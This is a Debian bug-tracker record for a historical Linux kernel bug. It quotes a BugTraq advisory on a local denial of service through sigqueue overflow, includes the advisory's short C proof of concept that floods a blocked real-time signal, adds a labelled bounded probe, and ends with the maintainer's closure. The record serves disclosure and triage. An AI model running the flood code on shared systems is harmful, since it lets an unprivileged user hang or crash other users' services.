
Bug#243954: marked as done (DoS on Linux kernel 2.4 and 2.6 using sigqueue overflow)



Your message dated Sun, 16 Jan 2005 11:47:08 +0900
with message-id <81acraqedv.wl@omega.webmasters.gr.jp>
and subject line Bug#243954: Processed: Reopen and Reassign 243954
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 15 Apr 2004 20:13:53 +0000
Date: Thu, 15 Apr 2004 16:13:30 -0400
From: Phillip Hofmeister <plhofmei@zionlth.org>
To: submit@bugs.debian.org
Subject: DoS on Linux kernel 2.4 and 2.6 using sigqueue overflow
Message-ID: <20040415201330.GA21803@zionlth.org>
User-Agent: Mutt/1.4.2i
X-PGP-Key: http://www.zionlth.org/~plhofmei/key.asc

Package: kernel
Severity: Critical
Tag: Security

Justification: Any non-privileged user could cause the lock up of a
production system running the Linux kernel since child processes will
not terminate correctly.

Below is an email that describes the problem (posted on BugTraq)

<BugTraq Message>

From: "Nikita V. Youshchenko" <yoush@cs.msu.su>
To: bugtraq@securityfocus.com
Subject: Possible DoS on Linux kernel 2.4 and 2.6 using sigqueue overflow.
Date: Mon, 12 Apr 2004 06:06:04 -0400
User-Agent: KMail/1.5.4

Hello.

We faced a bug (?) in the Linux kernel causing different misbehaviours on
our server. After exploration, it seems that we found some security
implications of this issue.


When a process exits, its parent is notified by SIGCHLD, and the finished
child is kept in the process table in "zombie" state until the parent
process (or init, if the parent has already ended) handles the child exit.

Similarly, with linuxthreads, when a thread exits, another thread in the
same process is notified by signal 33 (SIGRT_1), and the exited thread
stays in the process table in "zombie" state until the exit is handled.

When a signal that notifies about an exit is generated by the kernel,
kernel code allocates a "struct sigqueue" object. This object keeps
information about the signal until the signal is delivered.

Only a limited number of such objects may be allocated at a time.
There is some code in the kernel that still allows signals with numbers
less than 32 to be delivered when a "struct sigqueue" object can't be
allocated. However, for signal 33 the signal generation routine just
returns -EAGAIN in this case.
As a result, the process is not notified about thread exits, and the
ended thread is left in "zombie" state.
Details are at
http://www.ussg.iu.edu/hypermail/linux/kernel/0404.0/0208.html

For long-living processes that create short-living threads (such as
mysqld), this causes process table overflow in several minutes.

"struct sigqueue" overflow may be easily caused from userspace, if a
process blocks a signal and then receives a large number of such signals.
The following sample code does that:

#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(void)
{
        sigset_t set;
        int i;
        pid_t pid;

        /* Block real-time signal 40 so every copy stays queued
         * instead of being delivered. */
        sigemptyset(&set);
        sigaddset(&set, 40);
        sigprocmask(SIG_BLOCK, &set, 0);

        /* Each kill() of a blocked RT signal allocates a
         * "struct sigqueue" that is never freed while we sleep. */
        pid = getpid();
        for (i = 0; i < 1024; i++)
                kill(pid, 40);

        /* Hold the queued signals for as long as the process lives. */
        while (1)
                sleep(1);

        return 0;
}

So if a user runs such code (or just runs a buggy program that blocks a
signal and then receives 1000 such signals, which happens here), this
will cause a DoS against anything running on the same system that uses
linuxthreads, including daemons running as root.

On systems that use NPTL (such as the Linux 2.6 kernel) there is no 'thread
zombie' problem, because NPTL uses another notification mechanism.
However, a DoS is still possible (and really happens, in the form of daemon
crashes), because when it is not possible to allocate a "struct sigqueue"
object, kernel behaviour in signal passing changes, causing random hangs
and segfaults in different programs.

</BugTraq Message>

I have compiled the code and executed it on my system.  I am currently
running 2.4.26 (Stock Kernel from kernel.org along with the GRSecurity
Patch).  It would appear this problem has not been fixed with the
release of 2.4.26.

Take care,

-- 
Phillip Hofmeister

PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.asc | gpg --import
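
Added example, not part of the bug report or of the quoted BugTraq post: the probe below reuses the post's technique (block a real-time signal, then kill() yourself with it repeatedly) with a bounded count, and unlike the original it drains the queue afterwards, so it can be run on a live system without leaving signals pending. It records how many kill() calls the kernel refuses with EAGAIN, the failure mode the post describes, and then counts with sigtimedwait() how many entries were actually queued. It uses SIGRTMIN+6, which is signal 40 on glibc, matching the original; signal 33 is reserved by glibc's NPTL and is not used. The RLIMIT_SIGPENDING read is an assumption about the running kernel (the per-user cap on queued signals, visible as "ulimit -i"), not something the page states.

```c
/* Added example (not from the original report): probe how many copies of
 * a blocked real-time signal the kernel will queue for this user, and
 * where it starts refusing them with EAGAIN. */
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

/* Current per-user cap on queued signals (RLIMIT_SIGPENDING, "ulimit -i").
 * Assumption: the running kernel exposes this limit. Returns -1 if it is
 * RLIM_INFINITY or cannot be read. */
long sigpending_limit(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_SIGPENDING, &rl) != 0 || rl.rlim_cur == RLIM_INFINITY)
        return -1;
    return (long)rl.rlim_cur;
}

/* Block `signo`, send it to ourselves `count` times, note how many kill()
 * calls were accepted and how many failed with EAGAIN, then drain the
 * queue with sigtimedwait() and count the entries that were really
 * queued. Restores the old mask. Returns the drained count, or -1 if
 * `signo` is not a real-time signal or the mask cannot be set.
 * `sent_out` and `eagain_out` may be NULL. */
int queue_rt_signals(int signo, int count, int *sent_out, int *eagain_out)
{
    sigset_t set, old;
    struct timespec zero = {0, 0};
    int i, sent = 0, eagains = 0, drained = 0;
    pid_t pid = getpid();

    if (signo < SIGRTMIN || signo > SIGRTMAX) {
        errno = EINVAL;
        return -1;
    }
    sigemptyset(&set);
    sigaddset(&set, signo);
    if (sigprocmask(SIG_BLOCK, &set, &old) != 0)
        return -1;

    /* Every accepted kill() of a blocked RT signal costs one queue entry;
     * EAGAIN is the kernel refusing to allocate another one. */
    for (i = 0; i < count; i++) {
        if (kill(pid, signo) == 0)
            sent++;
        else if (errno == EAGAIN)
            eagains++;
        else
            break;
    }

    /* Drain: RT signals are not collapsed, so each queued copy is
     * returned by its own sigtimedwait() call; a zero timeout makes the
     * call fail with EAGAIN once the queue is empty. */
    while (sigtimedwait(&set, NULL, &zero) == signo)
        drained++;

    sigprocmask(SIG_SETMASK, &old, NULL);
    if (sent_out)
        *sent_out = sent;
    if (eagain_out)
        *eagain_out = eagains;
    return drained;
}

int main(void)
{
    int sent = 0, eagains = 0, queued;

    printf("RLIMIT_SIGPENDING = %ld\n", sigpending_limit());
    queued = queue_rt_signals(SIGRTMIN + 6, 1024, &sent, &eagains);
    printf("kill() accepted %d, refused with EAGAIN %d, actually queued %d\n",
           sent, eagains, queued);
    return 0;
}
```

To see the refusal without sending thousands of signals, lower the cap in the shell first, e.g. `(ulimit -i 16; ./probe)`: the accepted count stops at the limit and the rest of the kill() calls come back EAGAIN, which is the condition the post says linuxthreads could not cope with.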

---------------------------------------
Received: (at 243954-done) by bugs.debian.org; 16 Jan 2005 02:47:10 +0000
Date: Sun, 16 Jan 2005 11:47:08 +0900
Message-ID: <81acraqedv.wl@omega.webmasters.gr.jp>
From: GOTO Masanori <gotom@debian.or.jp>
To: 243954-done@bugs.debian.org
Subject: Re: Bug#243954: Processed: Reopen and Reassign 243954
In-Reply-To: <813c71enta.wl@omega.webmasters.gr.jp>
References: <20040417174908.GA2552@zionlth.org>
	<handler.s.C.108222790319833.transcript@bugs.debian.org>
	<813c71enta.wl@omega.webmasters.gr.jp>
User-Agent: Wanderlust/2.9.9 (Unchained Melody) SEMI/1.14.3 (Ushinoya)
 FLIM/1.14.3 (=?ISO-8859-4?Q?Unebigory=F2mae?=) APEL/10.3 Emacs/21.2
 (i386-debian-linux-gnu) MULE/5.0 (SAKAKI)

At Sun, 18 Apr 2004 16:40:33 +0900,
GOTO Masanori wrote:
> Because the kernel couldn't handle POSIX threads appropriately for a long
> time (over 5 years) before NPTL appeared, linuxthreads tried to use
> signals because of that kernel incapability.  This is a long-standing
> problem item, and one reason why NPTL (for both kernel and glibc) was
> written.  Use NPTL.

There's no reason to keep this report open.  I am closing it.

Regards,
-- gotom


